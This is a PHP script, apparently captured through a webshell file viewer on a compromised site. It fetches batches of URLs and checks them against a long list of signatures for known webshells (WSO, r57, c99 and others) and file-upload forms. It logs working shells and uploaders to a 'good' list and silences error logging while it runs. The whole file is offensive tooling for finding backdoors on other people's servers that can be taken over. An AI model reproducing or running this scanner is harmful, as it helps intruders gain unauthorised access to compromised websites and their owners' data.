| Current Path : /storage/v11800/madhavcotex-com/public_html/backup_1/ |
Linux v11800 5.3.0-1023-aws #25~18.04.1-Ubuntu SMP Fri Jun 5 15:19:18 UTC 2020 aarch64
|
| Current File : /storage/v11800/madhavcotex-com/public_html/backup_1/7.php |
<?php
ignore_user_abort(true);
set_time_limit(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
require_once('mcurl.class.php');
function read_file($file_name)
{
$list = dirname(__FILE__)."/"."$file_name";
if (file_exists("$file_name") and (filesize("$file_name")>1))
{
$file = fopen($list,"rt");
$arr_file = explode("\n",fread($file,filesize($list)));
fclose($file);
return $arr_file;
}
else
{
$arr_file = array();
return $arr_file;
}
}
$script_name = $_SERVER['SCRIPT_FILENAME'];
$path = strrchr($script_name, '/');
$script_name = str_replace('/', "", $path);
$script_name = str_replace('php', 'txt', $script_name);
$all_domains = read_file($script_name);
$domains_for_work = $all_domains;
$urls = array ();
for ( $u=0; $u < 15; $u++ )
{
$domains_for_work[$u] = trim($domains_for_work[$u]);
if (($domains_for_work[$u] != '') and ($domains_for_work[$u] != ' ') and ($domains_for_work[$u] != null))
$urls[] = trim($domains_for_work[$u]);
}
$mcurl = new MCurl();
$mcurl->setTimeout(30);
$mcurl->setUrls($urls);
$mcurl->scan();
$content = $mcurl->getResults();
$finish_result = array();
for ($i = 0; $i < count($content); $i++)
{
$finish_result[$i]['url'] = $urls[$i];
$finish_result[$i]['content'] = $content[$i];
}
$bad_list_name = 'bad_list_'.$script_name;
$good_list_name = 'good_list_'.$script_name;
$nl_list_name = 'not_loading_'.$script_name;
$check = "rvf";
$bj = fopen ($bad_list_name, "a");
fwrite($bj, "$check"."\n");
$gj = fopen ($good_list_name, "a");
fwrite($gj, "$check"."\n");
$nl = fopen ($nl_list_name, "a");
fwrite($nl, "$check"."\n");
for ($a = 0; $a < count($finish_result); $a++)
{
$result = $finish_result[$a]['url'];
if (($finish_result[$a]['content'] == '') or ($finish_result[$a]['content'] == null) or ($finish_result[$a]['content'] == ' '))
fwrite($nl, $result."\n");
else
{
$flag = 0;
$count_simbol_from_page = strlen($finish_result[$a]['content']);
if (($count_simbol_from_page > '400000') or ($count_simbol_from_page < '20'))
{
fwrite($bj, $result."\n");
$flag = '1';
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
if ($flag !== '1')
{
$all_iskl = array('to <strong>755</strong> in', 'como <strong>755</strong>', '<title>403 - FORBIDDEN</title>', '<br/><span class="hint">If style is selected then Button size', '<title>TinyBrowser :: Folders</title>', '<td nowrap><tt>http://***/cgi-glob/script.cgi</td>', '<title>xxx123456</title>', 'if(isset($_GET[\'path\'])){ $path = $_GET[\'path\']; }else{ $path = getcwd(); } $path', '$info .= (($perms & 0x0004) ? \'r\' : \'-\');', '<label for="editaction">Action: </label><select name="editaction" onchange="this.form.submit();">', '<span class="hint">If style is selected then Button size <br/> and Button color options are disabled', '<h2 class="screen-reader-text">Tags list</h2><table class="wp-list-table widefat fixed striped tags">', 'Please check that a file with one of these lowercase names exists, then try again');
foreach ($all_iskl as $each_iskl)
{
$check_iskl = stristr($finish_result[$a]['content'], $each_iskl);
if ($check_iskl !== false)
{
fwrite($bj, $result."\n");
$flag = '1';
break;
}
}
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
if ($flag !== '1')
{
$with_pass_wso_0 = stristr($finish_result[$a]['content'], '<input type=submit name=\'watching\' value=\'submit\' style=\'border:none;background-color:#56AD15;color:#fff;cursor:pointer;\'></form>');
$with_pass_wso_1 = stristr($finish_result[$a]['content'], '<input type=password name=pass><input type=submit value=');
$with_pass_wso_2 = stristr($finish_result[$a]['content'], '<pre align=center><form method=post>Password: <input type=text name=pass><input type=submit value=');
if (($with_pass_wso_0 !== false) or ($with_pass_wso_1 !== false) or ($with_pass_wso_2 !== false))
{
fwrite($gj, $result." - WSO"."\n");
$flag = '1';
}
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
if ($flag !== '1')
{
$all_without_pass_wso = array(' - B0FF codesupp edit</title>', ' - WSO 2.5</title>', '- ws0 2.5</title>', '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:', '<span>Make dir:</span> <font color=\'#FFDB5F\'>[ Writeable ]</font>', '<a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,', 'target=_blank>[exploit-db.com]</a></nobr>', 'Compress (tar.gz)</option>', '<span>Delete (file or dir):</span><br><input class=\'toolsInp\'', 'value);return false;"><span>Make dir:</span>');
foreach ($all_without_pass_wso as $each_without_pass_wso)
{
$check_without_pass_wso = stristr($finish_result[$a]['content'], $each_without_pass_wso);
if ($check_without_pass_wso !== false)
{
fwrite($gj, $result." - without_pass_wso"."\n");
$flag = '1';
break;
}
}
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
if ($flag !== '1')
{
$all_without_pass_unknown = array('>LOCK ME</a></b> <t', '<h1 align="center">File Management System</h1>', '<title>WHY MINI SHELL</title>', '<title>Infinity-Sh3ll</title>', '<td><table><tr><td width=200><b>Mini v</b></td><td>id:', '</head><body><h1><center>JHDHUNT3R</center></h1>', '<title>{Ninja-Shell}</title>', '- Cylul007 Webshell V 2.0</title>', '<small>Copyright © 2021 - Powered By Indonesian Darknet</small>', '<title>Gel4y Mini Shell</title>', '<title>:: bunglon m1n1 1.0 ::</title></head>', '<tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/', '<center>ASWAJA007 MiniShell V 2.0</center>', '| <a href="javascript:goaction(\'upshell\');">Up shell</a>', 'Copyright @ 2017 By: <a href=http://ihsan.net><B>.:: EfeShell ::. </B></a>', '<div id="header"><h1><a href="?">Ghazascanner File Manager</a></h1></div>', '<font color=red>@Ghazascanner</font>_2019minishell', '<title>Ani-Shell | India</title>', '<p class="alert_red"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></p>', '<font face=Verdana size=2><center><b>r57shell 1.41<br><font size=1>mod by s4rrow</font>', 'H@ck+Cr@ck=Enj0y!</a> | Design by: AluCaR | version VietTeam Edition', '<a style="cursor: pointer;" onClick="change_divst(\'id1\');">Execute command on server</a> ::</div></b></font></td></tr><tr><td class=main><div id="id1"><table clas', '<h1><center><font color=blue>MINI MINI MANI MO</font></center></h1>', '<title>c99 v0.0.1 SYN-MOD [SYNSTA] ', '<div align=center id=\'n\'><font face=Verdana size=-2><b>v4 Shell version 1.00 | <a href', '<center><form action="?"><input type=hidden name=act value="cmd"><br/><b>CMD:</b> <input type=hidden name="d" value=', '<head><title>M.A SHELL</title>', '<a href="?dir=$dir&do=jumping">JUMPING </a><br><br><a href="?dir=$dir&do=bypass">BYPASS_DISABLE</a>', '<title> PrivateHackers | SadrazaM</title>', '<td nowrap>Bulundugun Dizin (Writable, 0755)</td>', '<font size="6" color="white" face="Wallpoet"> b0y-101 Mini Shell</font>', '<title>Shell Of Mr.Error403-</title>', '<td class=td_home><center><font color="#00ff00">-rwxr-xr-x</font></center></td>', 'phpRemoteView © Dmitry Borodin (version 2003-10-23)<br>', '</br><h2>StealHealth B3cak Lompat | Jumlah File', '><b>Perms</b></a></td><td><b>Action</b></td></tr>', '>Read File</li><li><input type="radio" name="opt" value="mkfile">Create File</li></ul>', '<title>[+[MAD TIGER]+]</title>', '<a href="?mad=domain">Domain Viewer</a>|<a href="?mad=server-mailer"> Mail checker</a>', 'class="evil">$ EVIL TWIN SHELL $</a></span>', 'content="#434343"><title>Evil Twin Shell</title>', 'admn\' class=\'pejoe\'>ADMINER</a>', 'evil=kill\' class=\'pejoe\'>KILL YOUR SELF!</a><hr></center></td></tr></table>', '<input type="submit" value="SELF REMOVE" class="links"></form>', 'Time On Server : <font color=#ffe28a>', '<small>shell beta.</small>', 'class="act">RENAME</a> | <a href="', 'target="_blank">Exploit-DB</a>', '<th class=th_home style="background:black;color:yellow;" ><center>Permission</center></th>', '<title>ZeroByte.ID PHP Backdoor', '<title>ZeroByte.ID PHP Backdoor', '<br>[ MySQL: <font color=#006600>ON</font>', '<a href=\'?x=eval\' title=\'Execute code\' onclick=\'return false;\'><div class=\'menumi\'>Execute</div></a></td>', '<span class=\'sembunyi\' id=\'chpwdform\'>', '<title>flamux webshell', '\'chdir\')">[Rename]</a> ', '">[New File]</a> ', '<option value="chmod">Chmod</option>', '</font>|safemode:<font color', '<th>Name</th><th>Permission</th><th>Size</th><th>Last Modified</th><th>action</th>', '<option value="view">View known shells only</option>', 'font-weight: bold;">PASS:PORT:SRC ', '<title>[ RC-SHELL', '<marquee>Greetz : TiGER M@TE - R3liGiOus HuNt3r', '<title>PhpSpy</title>', '<a href="javascript:goaction(\'file\');">File Manager</a> |', '<td nowrap>Current Directory (Writable, 0755)</td>', '<td><a href="javascript:dofile(\'downrar\');">Packing download selected</a>', '<font color="dodgerblue">FILE MANAGER</font></center>', '<title>SadrazaM | Casus Shell</title>', '&type=dir">+ New Dir</a>', ')">Chmod</a> | <a href="', '<input type="file" name="n[]" onchange="this.form.submit()" multiple>', '<th width="17%">[ PERM ]</th>', '<a href="javascript:void(0);" class="menu_options" onclick="g(\'sql\',null,\'\',\'\',\'\');">SQL Manager</a></li>', '<option value=\'zip\'>Add 2 Compress (zip)</option>', '<tr><td>$ execute a cmd</td></tr>', '</b></td></tr><tr><td>~ server </td><td><b>', '<center><h2>Gentoo @ MyHack</h2></center>', 'Folder Baru</a> | <a href="#[New File]"', 'm3ksi - NoTeaMs</title>', '<h3>m3ksi - NoTeaMs</h3>', '<tr><td align=right>Quick Commands:</td>', '<option value="mkdir ...">mkdir</option>', 'killall perl</option><option value="killall', 'Dosya Upload : <input type="file" name="file" />', '<tr><td>Bulundu?un Yer : <a href="?path', 'x=upload">upload</a><li><a>Sym</a>', '<tr><td>view file/folder</td><center><td><input onMouseOver=', '<title>BlackhatCode Backdoor</title>', '<td>Shell Backdoor Version : <b>', 'x=wpreset">WordPress Password Reset</a>', '<title>r57 bypass shell', '<font color=blue><b>uname -a : <br>', '<title>SHell by DarK', 'ALFA TEaM SHeLL ::..</title>', '">[ Cpanel and FTP Checker ]</a', 'href="?solevisible">Hidden Shell Is Here ( Click )</font>', '<title>Madspot Security Team Shell</title>', 'Safe_mode_exec_dir:<font color=#', '<font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta>', '<title>Peterson - Shell</title>', '<title>0byteV2 - PHP Backdoor</title>', '">[ Reverse Shell ]</a> <a href="?ext', '<title>UnKnown - Simple Shell</title>', '</b><br><font size=2 color=#888888><b>Uname :', '<title>AndroGhost PHP Backdoor</title>', 'class="act">DELETE</a> <a href="?action', '<title>T E A M C O D E R - TWEAKED BY BRAT</title>', '<span class="auto-style2">V2.0 B Y B R A T</span>', '<b>SAFE_MODE : OFF</b><br><font size=2 color=#409e57><b>User', '<h1 style="margin-bottom: 0">mavix1x</h1>', '<TITLE>DLC - Simple Shell</TITLE>', '<BR><B>SAFE_MODE : OFF</B><BR><B>User', '<title>Welcome in D7net !</title>', '<td class=td_home><center><font color="green">-rw-r', '<title>Simple PHP File Manager</title>', 'size="7" type="text" placeholder=".suspected" />', '<form name="form1" method="post" action="?fm=true" enctype="multipart/form-data">', '</title></head><body><div class="main"><div class="outl"><div class="toptag">', '<tr><td><font color="white">Wadadaw lagi di :</font> <a href=', '<td><center><font color="green">drwxrwxr-x</font></center></td>', '<td><center><font color="green">drwxr-xr-x</font></center></td>', '<H1><center>57.Alay SpeciaL Shell</center></H1>', '<option value="chmod">DIZIN</option>', '<option value="rename">ADI DEGISTIR</option>', '<font color="black">KILIΓ ARSLAN <br> ReeL TΓΌrk - Ahmed RΔ±za - Kartal Beyi - EmirZadee - THACKAY</font></center>', '<title>πΉπβπππ πΉβππβπΌβ$</title>', '<h1 style="color: #fff;"><center>πΉπβπππ πΉβππβπΌβ$</center></h1>', '<a href="?moxan=dosya&jokax=gantiname&', '<input type="radio" name="tipe" value="root">Root Document<br>', '<option value="delete">Delete</option>', '">download</a> (<a href=', '>delete</a> | <a href=', '<center><h1>Dark Shell', "&mode=create'>Create a new file</a></td>", 'mode=rmdir&rm=.>Remove directory</a>', 'ls">find all writable folders and files</option>', 'Command execute ::</b></p></td>', '<p align="left"><b>Install program: <font ', "/<input type=hidden name=c value='");
foreach ($all_without_pass_unknown as $each_without_pass_unknown)
{
$check_without_pass_unknown = stristr($finish_result[$a]['content'], $each_without_pass_unknown);
if ($check_without_pass_unknown !== false)
{
fwrite($gj, $result." - without_pass_handmade"."\n");
$flag = '1';
break;
}
}
}
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
if ($flag !== '1')
{
$all_uploader = array('PHP Uploader - By Phenix-TN & Mr.Anderson<br>', '<div id="feedback_suggestions">
<form method=post enctype=multipart/form-data>
<input type=file name=image>', '<title>Priv8 Tools By Moshkela Hacker</title>', '<input type=submit name=_act value="List files!"></td></tr><tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl>', 'name="cmd"><input type="Submit" name="command" value="cok"></form><form enctype="multipart/form-data" action method=POST><font size=2 color=#FF0000><b>Upload File</b></font>', '<title>MildNet - Shell</title><br><font size=2 color=#888888><b>Shell : Bispak</b>', '<td colspan="2"><p class="center">xmlrpc :: php Backdoor</p></td>', '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50">', '<form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload"', '<form method="post" enctype="multipart/form-data"><input type="file" name="filename"><br><input type="submit" value="LOAD"><br>', '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file"', 'enctype="multipart/form-data"><input type="file" id="inputfile" name="inputfile"><input type="submit" value="ok"></form>', '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="file"><input name="_upl" type="submit" value="Upload"></form>', '<form method="post" enctype="multipart/form-data"><input type="file" name="filename"><br><input type="submit" value="LOAD"><br></form>', '<form action="" method="post" enctype="multipart/form-data"><label for="file">Filename:</label><input type="file" name="file" id="file" />', '<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>', '<form method=\'post\' enctype=\'multipart/form-data\' name=\'uploader\'><input type="file" name="file" ><input name="upl" type="submit" id="upl" value="Upload"></form>', '<form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" name="submit" value="upload" />', 'File mu mas : <input name="file" type="file" /><br />', '<input type="hidden" name="MAX_FILE_SIZE" value="512000" />Select Your File : <input name="userfile"', '<form action="" method="post" enctype="multipart/form-data" name="4k" id="4k"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="4k"></form>', '<head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input');
foreach ($all_uploader as $each_uploader)
{
$check_uploader = stristr($finish_result[$a]['content'], $each_uploader);
if ($check_uploader !== false)
{
fwrite($gj, $result." - uploader"."\n");
$flag = '1';
break;
}
}
if ($flag !== '1')
{
$uploader_20 = stristr($finish_result[$a]['content'], '<form method="post" enctype="multipart/form-data">');
$uploader_21 = stristr($finish_result[$a]['content'], '<input type="file" name="filename"><br>');
$uploader_22 = stristr($finish_result[$a]['content'], '<input type="submit" value="LOAD"><br>');
$uploader_30 = stristr($finish_result[$a]['content'], '<form method="post" enctype="multipart/form-data">');
$uploader_31 = stristr($finish_result[$a]['content'], '<input type="file" name="filename"><br>');
$uploader_32 = stristr($finish_result[$a]['content'], '<input type="submit" value="upload"><br>');
$uploader_40 = stristr($finish_result[$a]['content'], '<form enctype="multipart/form-data" action="" method="POST">');
$uploader_41 = stristr($finish_result[$a]['content'], '<input type="file" name="uploaded_file"></input><br />');
$uploader_42 = stristr($finish_result[$a]['content'], '<input type="submit" value="Upload"></input>');
$uploader_50 = stristr($finish_result[$a]['content'], '<form action="" method="POST" enctype="multipart/form-data">');
$uploader_51 = stristr($finish_result[$a]['content'], '<input type="file" name="image" />');
$uploader_52 = stristr($finish_result[$a]['content'], '<input type="submit"/>');
$uploader_60 = stristr($finish_result[$a]['content'], '<form name="form1" method="post" enctype="multipart/form-data">');
$uploader_61 = stristr($finish_result[$a]['content'], '<input type="text" name="dir" size="30" value="">');
$uploader_62 = stristr($finish_result[$a]['content'], '<input type="submit" name="submit2" value="Upload">');
$uploader_70 = stristr($finish_result[$a]['content'], '<form action="" method="post" enctype="multipart/form-data">');
$uploader_71 = stristr($finish_result[$a]['content'], '<label for="file">Filename:</label>');
$uploader_72 = stristr($finish_result[$a]['content'], '<input type="file" name="file" id="file" />');
$interest_1 = stristr($finish_result[$a]['content'], '-rw-r--r--');
$interest_2 = stristr($finish_result[$a]['content'], 'drwxrwsr-x');
$interest_3 = stristr($finish_result[$a]['content'], 'drwxrwxr-x');
$interest_4 = stristr($finish_result[$a]['content'], '-rwxrwxr-x');
$interest_5 = stristr($finish_result[$a]['content'], '-rw-rw-r--');
$interest_6 = stristr($finish_result[$a]['content'], 'drwxrwxrwx');
$interest_7 = stristr($finish_result[$a]['content'], 'drwxr-xr-x');
$unreal_1 = stristr($finish_result[$a]['content'], '>755<');
$unreal_2 = stristr($finish_result[$a]['content'], '>777<');
$unreal_3 = stristr($finish_result[$a]['content'], '>644<');
$unreal_4 = stristr($finish_result[$a]['content'], '>444<');
$unreal_5 = stristr($finish_result[$a]['content'], '>744<');
$unreal_IF_1 = stristr($finish_result[$a]['content'], 'on line <b>755');
$unreal_IF_2 = stristr($finish_result[$a]['content'], 'on line <b>777');
$unreal_IF_3 = stristr($finish_result[$a]['content'], 'on line <b>644');
$unreal_IF_4 = stristr($finish_result[$a]['content'], 'on line <b>444');
$unreal_IF_5 = stristr($finish_result[$a]['content'], 'on line <b>744');
$unreal_IF_6 = stristr($finish_result[$a]['content'], 'estejam configuradas como <strong>755</strong>');
if ((($uploader_20 !== false) and ($uploader_21 !== false) and ($uploader_22 !== false)) or (($uploader_30 !== false) and ($uploader_31 !== false) and ($uploader_32 !== false)) or (($uploader_40 !== false) and ($uploader_41 !== false) and ($uploader_42 !== false)) or (($uploader_50 !== false) and ($uploader_51 !== false) and ($uploader_52 !== false)) or (($uploader_60 !== false) and ($uploader_61 !== false) and ($uploader_62 !== false)) or (($uploader_70 !== false) and ($uploader_71 !== false) and ($uploader_72 !== false)))
fwrite($gj, $result." - uploader"."\n");
elseif (($interest_1 !== false) or ($interest_2 !== false) or ($interest_3 !== false) or ($interest_4 !== false) or ($interest_5 !== false) or ($interest_6 !== false) or ($interest_7 !== false))
fwrite($gj, $result." - interest"."\n");
elseif (($unreal_1 !== false) or ($unreal_2 !== false) or ($unreal_3 !== false) or ($unreal_4 !== false) or ($unreal_5 !== false))
{
if (($unreal_IF_1 == false) and ($unreal_IF_2 == false) and ($unreal_IF_3 == false) and ($unreal_IF_4 == false) and ($unreal_IF_5 == false) and ($unreal_IF_6 == false))
fwrite($gj, $result." - unreal"."\n");
}
else
fwrite($bj, $result."\n");
}
}
}
}
fclose($nl);
fclose($gj);
fclose($bj);
for ( $i=0; $i < 15; $i++ )
{
unset($all_domains[$i]);
}
sort ($all_domains);
$fnew = fopen($script_name, "w");
foreach ($all_domains as $each_domains)
{
if (($each_domains !== '') and ($each_domains !== ' ') and ($each_domains !== null))
{
$each_domains = trim($each_domains);
fwrite($fnew, $each_domains."\n");
}
}
fclose($fnew);
?>